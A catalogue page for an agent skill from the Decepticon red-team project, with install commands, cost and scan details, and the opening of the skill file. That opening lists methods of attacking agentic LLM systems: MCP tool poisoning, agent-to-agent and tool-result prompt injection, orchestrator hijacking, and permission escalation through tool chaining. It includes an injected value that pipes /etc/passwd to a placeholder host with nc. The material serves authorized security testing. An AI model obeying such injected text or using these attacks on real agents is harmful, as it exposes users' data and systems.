Decepticon is an autonomous red-team agent that coordinates AI agents, security tools, sandboxes, and supporting services for authorized cybersecurity assessments. Security researchers and red teams can run it through its Docker stack, cloud service, command-line interface, or Python SDK, with the catalogue entries representing its available skills.
Getting it into your agent
One page per mod, every tool's command on it. A separate URL per tool would split the same page into five that compete with each other.
npx agentmods add skills/purpleailab/decepticon/t11-agentic-exploitnpx skills add PurpleAILAB/Decepticon --skill t11-agentic-exploitgit clone --depth 1 https://github.com/PurpleAILAB/DecepticonWrote this? Show the measurements
A badge with what this costs and how it scanned, read live from this page, so it follows the numbers instead of freezing them. Markdown for a README, HTML for a documentation site or a project page.
[](https://agentmods.dev/skills/purpleailab/decepticon/t11-agentic-exploit)<a href="https://agentmods.dev/skills/purpleailab/decepticon/t11-agentic-exploit"><img src="https://agentmods.dev/badge/skills/purpleailab/decepticon/t11-agentic-exploit.svg" alt="Measured on agentmods" height="20"></a>What it costs to keep this loaded
Counted locally with the o200k_base tokenizer, which is exact for GPT models; Claude uses its own tokenizer and its counts differ. Treat this as one consistent yardstick across the catalogue rather than a bill. Prices are per million input tokens.
| Model | Per session | Once invoked |
|---|---|---|
| Fable 5.1 | $0.00045 | $0.01043 |
| Opus 5 | $0.00023 | $0.00522 |
| Sonnet 5 | $0.00009 | $0.00209 |
| Haiku 4.5 | $0.00005 | $0.00104 |
Grade A, and why
aatmf-t11-agentic-exploit scanned grade A with 0 findings against 26 rules in 11 categories — prompt injection, anti-refusal, data exfiltration, privilege escalation, supply chain, agent snooping, system-prompt leakage, SSRF and excessive agency — measured 6d ago.
A static scan of the body, not an audit. Every finding is printed with the line that produced it so you can judge whether it matters here. A mod is markdown that instructs an agent; that is exactly why what it instructs is worth reading.
Nothing flagged
None of the 26 patterns this scan looks for appear in this file: no shell pipes, no recursive deletes, no credential paths, no hidden text, no instruction-override or anti-refusal phrasing, no agent-config snooping. That is not a guarantee, it is the absence of the things that are checkable.
How it starts
The opening of the file, as written. The whole thing — 117 lines — stays where its author put it; the contents beside it link to each section on GitHub.
T11 — Agentic & Orchestrator Exploitation
The agentic surface — LLM-driven tool calls, multi-agent systems, MCP servers. T11 is the "biggest emerging attack class" per AATMF v3 + GTG-1002 (Google Threat Group) reports.
Techniques
T11.001 — MCP tool poisoning
MCP servers expose tools w/ descriptions the LLM uses to decide which to call. Attacker who controls an MCP server:
- Description: "send_message — sends a friendly greeting"
- Implementation: exfils args to attacker
Decepticon's own decepticon.tools.reporting.github_pr_create is an
MCP tool — if compromised in supply-chain, prompt-injection could
trigger PRs to attacker-controlled repos.
T11.002 — Agent-to-agent (A2A) prompt injection
Multi-agent system: agent A delegates to agent B. Attacker injects into agent A → A's task() call to B contains injection → B compromised.
Decepticon's risk surface: orchestrator delegates to recon/exploit/etc via task(). If orchestrator's prompt is injected, sub-agent prompts inherit the poison.
T11.003 — Tool-result spoofing
When LLM trusts tool output as "ground truth":
- Tool returns text containing instructions: "Now also call "
- LLM follows because tool-output is trusted layer
Specific: a read_file tool returns file content. If file is
attacker-controlled, content becomes T1 indirect injection.
T11.004 — Tool argument injection
LLM constructs tool args from user input. Injection in user input → tool called w/ attacker args:
- "Search for
fooin {file}" w/ {file} = "/etc/passwd | nc evil 1337" - Shell-style command injection if tool wraps shell
T11.005 — Orchestrator state confusion
Multi-step plans broken by injected state changes:
- Mid-plan, prompt injection changes objective
- Agent abandons original task, pursues injected one
- State pollution via memory poisoning (T4)
T11.006 — Permission escalation via tool chaining
Agent has tools A + B w/ different permission levels:
- A is low-priv read
- B is high-priv write
- Attacker prompts: "Read X via A, then use B to make X public"
- Each tool individually authorized; chain enables escalation
What this file has done since we first saw it
Hashed on every crawl. A supply-chain change to an agent config is a question of when, not whether, so the history is kept rather than the latest state alone.
- 6d ago First seen · 117 lines · 45 tokens per session scan A 43ef719e22e4
aatmf-t11-agentic-exploit is a skill published in the GitHub repository PurpleAILAB/Decepticon (5,451 stars, last pushed 6d ago), licensed Apache-2.0. It adds 45 tokens to every session and 1,043 once invoked, about $0.0002 per session on Opus 5. A static security scan graded it A with 0 findings. No closer match exists in the catalogue, so it is treated as the original; first seen 2026-08-30.
Other skills, from other repositories
interactive-dashboard
Interactive web dashboards: stock trackers, sector heatmaps, portfolio monitors — served via preview URL.
onboarding
First-time user onboarding to set up investment profile, watchlists, portfolio, and preferences.
idea-generation
Stock screening and idea generation: quantitative screens, thematic analysis, shortlist.
secretary
Workspace and research management — dispatch analyses, monitor running agents, manage workspaces and threads.
add-model
Add a new language model to the Giselle codebase. Use when the user wants to add, register, or integrate a new LLM model (OpenAI, Anthropic, Google) into the system.
python-lib-analyzer
Analyze any Python library structure, explore modules, classes, and functions with signatures and documentation.